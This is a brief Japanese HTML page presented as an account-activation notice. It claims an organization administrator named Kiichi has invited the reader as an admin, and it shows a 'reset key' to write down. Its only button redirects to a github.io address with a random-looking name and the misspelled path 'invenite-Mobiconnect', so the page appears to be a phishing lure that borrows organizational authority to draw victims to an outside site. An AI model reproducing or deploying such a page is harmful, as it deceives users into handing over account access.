<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>認証</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      background-color: #f2f2f2;
      color: #333;
      text-align: center;
    }

    h1 {
      margin-bottom: 20px;
      color: #007bff;
    }

    p {
      margin-bottom: 30px;
      line-height: 1.5;
      font-size: 18px;
      max-width: 400px; /* 最大幅を指定して読みやすく */
    }

    .button-container {
      margin-top: 20px;
    }

    button {
      padding: 15px 30px;
      border: none;
      border-radius: 5px;
      background-color: #007bff;
      color: white;
      font-size: 18px;
      cursor: pointer;
      transition: background-color 0.3s;
    }

    button:hover {
      background-color: #0056b3;
    }
  </style>
</head>

<body>
  <h1>アカウント認証</h1>
  <p>輝一さん（組織管理者）からあなたが管理者として招待されました。アカウントをアクティブにしてください。</p>
  
  <div class="button-container">
    <button onclick="window.location.href='https://user0888361.github.io/id-1985338258525875.invenite-Mobiconnect/'">アクティブにする</button>
<h4>以下のリセットキーをメモしてください</h4>
<h1>G-D1465</h1>
  </div>
</body>

</html>